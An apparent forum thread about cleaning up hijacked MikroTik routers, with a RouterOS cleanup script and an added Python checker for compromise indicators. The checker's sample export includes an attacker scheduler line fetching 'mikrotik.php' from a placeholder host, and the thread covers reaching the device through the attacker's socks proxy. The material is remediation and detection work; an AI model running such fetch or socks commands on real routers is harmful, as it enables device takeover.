As I mentioned my file was empty as well, makes sense with what you guys are saying.

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
Haha, actually no, just one based on an almost complete ignorance of socks!

No idea, but possible.

Is he trying to use Winbox to connect

I assume that's a rhetorical question.

How would you route a Winbox connection through a socks proxy?
From kobuki's suggestion, I use http to log in via socks, not winbox.

Smart idea. Is he trying to use Winbox to connect and if so how would you route a Winbox connection through a socks proxy?

If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.

2. I have tried to log in to the remote mikrotik with that password but no success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker uses a script to disable hard reset, so I just ask: can I use the serial cable to log in? (The infected router is still located in another place.)
Don't tell me, tell the guy that wrote the blog post. He did see it happen in his tcpdump though, I don't think he wrote that more than 3-4 months ago.

Winbox has not fetched DLLs for quite some time now. Do not use old winbox.
# Cleanup script as posted: enlarge the log buffer, remove the attacker's firewall rules,
# socks settings, scripts, schedulers and user, then schedule a reboot and a firmware upgrade.
/system logging action set memory-lines=1000 [find where name=memory]
/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"]
# Disable socks and restore default settings, then drop all socks access rules
/ip socks set enabled=no port=1080 max-connections=200 connection-idle-timeout=00:02:00
/ip socks access remove [/ip socks access find]
# Remove the dropper and the script that re-enables socks
/system script remove [find where source~"mikrotik.php"]
/system script remove [find where source~"socks set enabled=yes"]
# Remove the attacker's schedulers and the "service" user they run as
/system scheduler remove [find where name~"port"]
/system scheduler remove [find where owner="service"]
/user remove [find name=service]
# Reboot at midnight; after the reboot, upgrade the RouterBOARD firmware and reboot again
/system scheduler add name=midnightReboot on-event="/system reboot\r\ny" start-time=23:59:00
/system scheduler add name=updateFirmware on-event="/system scheduler remove [find where name=\"updateFirmware\"]\r\n:delay 2s\r\n/system scheduler remove [find where name=\"midnightReboot\"]\r\n/system routerboard upgrade\r\n:delay 10s\r\n/system reboot\r\ny" start-time=startup
/system package update download
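As an added example (not code from the thread or from MikroTik), a small Python checker that reads a RouterOS /export and reports which of the artefacts the cleanup script above removes are present on a device; the sample export, its names and the placeholder host are constructed for this example.

```python
import re

# Constructed RouterOS "/export" fragment showing the thread's symptoms (sample text, not a real capture; host is a placeholder).
SAMPLE_EXPORT = r"""/ip socks
set enabled=yes port=4145 max-connections=200
/user
add group=full name=service
add address=127.0.0.1/32 group=full name=sys
/system scheduler
add name=port8291 on-event="/tool fetch url=http://PLACEHOLDER.invalid/mikrotik.php" owner=service
/system script
add name=keep owner=service source=":delay 5s\r\n/ip socks set enabled=yes"
"""

def parse_export(text):
    # Group lines under their "/menu" path; join lines RouterOS wrapped with a trailing backslash.
    sections, current, buf = {}, None, ""
    for raw in text.splitlines():
        line = buf + raw.strip()
        if line.endswith("\\"):
            buf = line[:-1]
            continue
        buf = ""
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
        elif line and not line.startswith("#") and current is not None:
            sections[current].append(line)
    return sections

def name_of(cmd):
    m = re.search(r"\bname=(\S+)", cmd)
    return m.group(1) if m else ""

def find_indicators(text):
    # Report which artefacts targeted by the thread's cleanup script are present.
    s, hits = parse_export(text), []
    if any("enabled=yes" in c for c in s.get("/ip socks", [])):
        hits.append("socks service enabled")
    for c in s.get("/user", []):
        if name_of(c) == "service":
            hits.append("user 'service' present")
        if "address=127.0.0.1/32" in c:
            hits.append(f"user '{name_of(c)}' limited to 127.0.0.1")
    for c in s.get("/system scheduler", []) + s.get("/system script", []):
        if name_of(c).startswith("port") or "owner=service" in c:
            hits.append(f"'{name_of(c)}' named port* or owned by 'service'")
        if "mikrotik.php" in c or "socks set enabled=yes" in c:
            hits.append(f"'{name_of(c)}' fetches mikrotik.php or re-enables socks")
    return hits
```

Feed it the output of `/export` taken over serial or an out-of-band console; an empty list means none of the thread's artefacts were found, which is a useful check after running the cleanup script.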